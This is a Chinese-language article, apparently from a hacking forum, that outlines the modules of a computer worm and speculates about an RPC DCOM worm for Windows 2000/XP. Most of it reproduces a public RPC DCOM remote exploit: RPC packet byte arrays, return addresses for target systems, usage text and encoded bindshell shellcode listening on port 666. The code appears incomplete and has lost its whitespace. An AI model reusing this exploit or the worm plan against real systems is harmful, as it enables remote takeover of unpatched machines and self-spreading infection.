最近好象几乎每一个大的漏洞公布出来，接着都会有一个针对这个漏洞的蠕虫(worm)流行，最近闹得很凶的RPCDCOM漏洞估计也即将成为worm的新传播载体。好象写worm是一个热门，很多人也觉得好奇，觉得worm是很深的一种技术，其实这个是很简单的编程游戏而已。我一直有个想法就是想写一篇关于worm的技术分析(---为了不教坏小孩子:)，只是一直懒得提笔，本人对蠕虫的编写已经失去了兴趣，现在在新的worm风暴即将到来之前，我这里很简单分析一下蠕虫的相关技术，并对RPCDCOM蠕虫进行一些设想。大家当我是助“纣”为虐也好，故意卖弄也好，我觉得还是要写这篇文章，一年多没写过文章了，同时也了却了自己的一个心愿。你现在可以选择不继续往下看，但看完后不要对我吐口水。:)

一什么叫蠕虫

首先从spark的《Internet蠕虫的定义和历史》文章中摘抄欢喂赜趙orm的解释:蠕虫这个生物学名词在1982年由XeroxPARC的JohnF.Shoch等人最早引入计算机领域[30]，并给出了计算机蠕虫的两个最基本特征："可以从一台计算机移动到另一台计算机"和"可以自我复制"。他们编写蠕虫的目的是做分布式计算的模型试验，在他们的文章中，蠕虫的破坏性和不易控制已经初露端倪。1988年Morris蠕虫爆发后，EugeneH.Spafford为了区分蠕虫和病毒，给出了蠕虫的技术角度的定义，"计算机蠕虫可以独立运行，并能把自身的一个包含所有功能的版本传播到另外的计算机上。"（wormisaprogramthatcanrunbyitselfandcanpropagateafullyworkingversionofitselftoothermachines.）。

由于这里不是向大家介绍蠕虫的定义和历史就不多说了，大家如果对这些感兴趣，可以到这里读spark的文章http://www.nsfocus.net/index.php?act=magazine&;;do=view&mid=1851

二蠕虫的组成部分

一个蠕虫的组成其实很简单，由于我不是在这里教你们写蠕虫，也由于时间限制，我这里只简单的说一些。

我们可以把它看做一个工程，我们把这个工程分成4个模块:

1.攻击模块

首先得需要有一个大量系统受影响的能被简单利用的严重漏洞，以便能够远程控制机器。比如猜测薄弱口令啊，远程溢出啊等。

2.感染模块

考虑怎么让对方被攻击后，执行你想要实现的功能，完成对一个主机的感染。对远程溢出来说也就是完善shellcode了。这中间得考虑一个感染传播(繁殖)途径的问题。

3.传播模块

比如，扫描一个网段有相关弱点的机器，存成一个文件，然后对这些IP进行攻击，或者随机生成IP然后对这些IP进行攻击等。

简单的说就是扫描薄弱的机器。

4.功能模块

功能模块其实是一个可要可不要的模块，但如果你想对方感染蠕虫后还在对方加上后门/DDoS等其他功能时，就必须得要有这个啦。

其实，一个蠕虫成功的关键是一个攻击模块和感染模块。:)

三常见的蠕虫的传播(繁殖)途经

具体就不深入了,只简单列举一下:

1.email

2.ftp

3.http

4.netbios

5.tftp

6.rcp

7.其他

四RPCDCOM漏洞介绍

RPCDCOM漏洞是最近出的一个Windows系统的严重漏洞，也是有史以来最严重影响最广泛的Windows漏洞。

RemoteProcedureCall(RPC)是运用于Windows操作系统上的一种协议。RPC提供相互处理通信机制，允许运行该程序的计算机在一个远程系统上执行代码。RPC协议本身源于OSF(OpenSoftwareFoundation)RPC协议，后来又另外增加了一些Microsoft专用扩展功能。RPC中处理TCP/IP信息交换的模块由于错误的处理畸形信息，远程攻击者可利用此缺陷以本地系统权限在系统上执行任意指令。该缺陷影响使用RPC的DCOM接口，此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。攻击者成功利用此缺陷可以以本地系统权限执行任意指令。攻击者可以在系统上执行任意操作，如安装程序、查看或更改、删除数据或建立系统管理员权限的帐户。

这个漏洞影响如下Windows版本：

MicrosoftWindowsXPSP1a

MicrosoftWindowsXPSP1

MicrosoftWindowsXP

MicrosoftWindowsNT4.0SP6a

MicrosoftWindowsNT4.0SP6

MicrosoftWindowsNT4.0SP5

MicrosoftWindowsNT4.0SP4

MicrosoftWindowsNT4.0SP3

MicrosoftWindowsNT4.0SP2

MicrosoftWindowsNT4.0SP1

MicrosoftWindowsNT4.0

MicrosoftWindows2003

MicrosoftWindows2000SP4

MicrosoftWindows2000SP3

MicrosoftWindows2000SP2

MicrosoftWindows2000SP1

MicrosoftWindows2000

可以看到,此漏洞影响除了WinME以下版本的Windows系统之外的所有其他Windows系统。同时，此漏洞能够被攻击者远程利用，

在没有修补该漏洞的机器上可以远程执行任意代码，导致攻击者能够完全控制有漏洞的机器。

五RPCDCOM蠕虫的设想

1.由于RPCCOM已经有攻击未打补丁的Win2000/WinXP的通用攻击代码发布出来，因此该漏洞更有可能被利用制作成为能够感染具有RPCDCOM漏洞的Win2000/WinXP机器的蠕虫。

如PacketStorm上公布的这个对Win2000和WinXP通用的Exploit:

/*Windows2003<=remoteRPCDCOMexploit

*Codedby.:[oc192.us]:.Security

*

*Features:

*

*-ddestinationhosttoattack.

*

*-pforportselectionasexploitworksonportsotherthan135(139,445,539etc)

*

*-rforusingacustomreturnaddress.

*

*-ttoselecttargettype(Offset),thisincludesuniversaloffsetsfor-

*win2kandwinXP(Regardlessofservicepack)

*

*-ltoselectbindshellportonremotemachine(Default:666)

*

*-ShellcodehasbeenmodifiedtocallExitThread,ratherthanExitProcess,thus

*preventingcrashofRPCserviceonremotemachine.

*

*Thisisprovidedasproof-of-conceptcodeonlyforeducational

*purposesandtestingbyauthorizedindividualswithpermissionto

*doso.

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

/*xfocusstart*/

unsignedcharbindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,

0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsignedcharrequest1[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03

,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

unsignedcharrequest2[]={

0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsignedcharrequest3[]={

0x5C,0x00

,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

/*endxfocus*/

inttype=0;

struct

{

char*os;

u_longret;

}

targets[]=

{

{"[Win2k-Universal]",0x0018759F},

{"[WinXP-Universal]",0x0100139d},

},v;

voidusage(char*prog)

{

inti;

printf("RPCDCOMexploitcodedby.:[oc192.us]:.Securityn");

printf("Usage:nn");

printf("%s-d[options]n",prog);

printf("Options:n");

printf("-d:Hostnametoattack[Required]n");

printf("-t:Type[Default:0]n");

printf("-r:Returnaddress[Default:Selectedfromtarget]n");

printf("-p:Attackport[Default:135]n");

printf("-l:Bindshellport[Default:666]nn");

printf("Types:n");

for(i=0;i<sizeof(targets)/sizeof(v);i++)

printf("%d[0x%.8x]:%sn",i,targets[i].ret,targets[i].os);

exit(0);

}

unsignedcharsc[]=

"x46x00x58x00x4Ex00x42x00x46x00x58x00"

"x46x00x58x00x4Ex00x42x00x46x00x58x00x46x00x58x00"

"x46x00x58x00x46x00x58x00"

"xffxffxffxff"/*returnaddress*/

"xccxe0xfdx7f"/*primarythreaddatablock*/

"xccxe0xfdx7f"/*primarythreaddatablock*/

/*bindshellnoRPCcrash,defineablespawnport*/

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90xebx19x5ex31xc9x81xe9x89xff"

"xffxffx81x36x80xbfx32x94x81xeexfcxffxffxffxe2xf2"

"xebx05xe8xe2xffxffxffx03x53x06x1fx74x57x75x95x80"

"xbfxbbx92x7fx89x5ax1axcexb1xdex7cxe1xbex32x94x09"

"xf9x3ax6bxb6xd7x9fx4dx85x71xdaxc6x81xbfx32x1dxc6"

"xb3x5axf8xecxbfx32xfcxb3x8dx1cxf0xe8xc8x41xa6xdf"

"xebxcdxc2x88x36x74x90x7fx89x5axe6x7ex0cx24x7cxad"

"xbex32x94x09xf9x22x6bxb6xd7xddx5ax60xdfxdax8ax81"

"xbfx32x1dxc6xabxcdxe2x84xd7xf9x79x7cx84xdax9ax81"

"xbfx32x1dxc6xa7xcdxe2x84xd7xebx9dx75x12xdax6ax80"

"xbfx32x1dxc6xa3xcdxe2x84xd7x96x8exf0x78xdax7ax80"

"xbfx32x1dxc6x9fxcdxe2x84xd7x96x39xaex56xdax4ax80"

"xbfx32x1dxc6x9bxcdxe2x84xd7xd7xddx06xf6xdax5ax80"

"xbfx32x1dxc6x97xcdxe2x84xd7xd5xedx46xc6xdax2ax80"

"xbfx32x1dxc6x93x01x6bx01x53xa2x95x80xbfx66xfcx81"

"xbex32x94x7fxe9x2axc4xd0xefx62xd4xd0xffx62x6bxd6"

"xa3xb9x4cxd7xe8x5ax96x80xaex6ex1fx4cxd5x24xc5xd3"

"x40x64xb4xd7xecxcdxc2xa4xe8x63xc7x7fxe9x1ax1fx50"

"xd7x57xecxe5xbfx5axf7xedxdbx1cx1dxe6x8fxb1x78xd4"

"x32x0exb0xb3x7fx01x5dx03x7ex27x3fx62x42xf4xd0xa4"

"xafx76x6axc4x9bx0fx1dxd4x9bx7ax1dxd4x9bx7ex1dxd4"

"x9bx62x19xc4x9bx22xc0xd0xeex63xc5xeaxbex63xc5x7f"

"xc9x02xc5x7fxe9x22x1fx4cxd5xcdx6bxb1x40x64x98x0b"

"x77x65x6bxd6x93xcdxc2x94xeax64xf0x21x8fx32x94x80"

"x3axf2xecx8cx34x72x98x0bxcfx2ex39x0bxd7x3ax7fx89"

"x34x72xa0x0bx17x8ax94x80xbfxb9x51xdexe2xf0x90x80"

"xecx67xc2xd7x34x5exb0x98x34x77xa8x0bxebx37xecx83"

"x6axb9xdex98x34x68xb4x83x62xd1xa6xc9x34x06x1fx83"

"x4ax01x6bx7cx8cxf2x38xbax7bx46x93x41x70x3fx97x78"

"x54xc0xafxfcx9bx26xe1x61x34x68xb0x83x62x54x1fx8c"

"xf4xb9xcex9cxbcxefx1fx84x34x31x51x6bxbdx01x54x0b"

"x6ax6dxcaxddxe4xf0x90x80x2fxa2x04";

【对RPC DCOM 蠕虫的设想】相关文章：

★ Sql Injection in DB2数据库

★ 对抗杀毒软件的内存扫描

★ sql注入建立虚拟目录

★ O-blog漏洞暴光

★ 并不神奇的Real影片木马

★ 用GOOGLE你瞬间成为黑客

★ 你根本想不到的——IIS另类后门

★ 利用DWRCC突破天网防火墙(经验)(图)

★ 入侵之中杀防火墙进程的代码

★ 打造完美的ＩＥ网页木马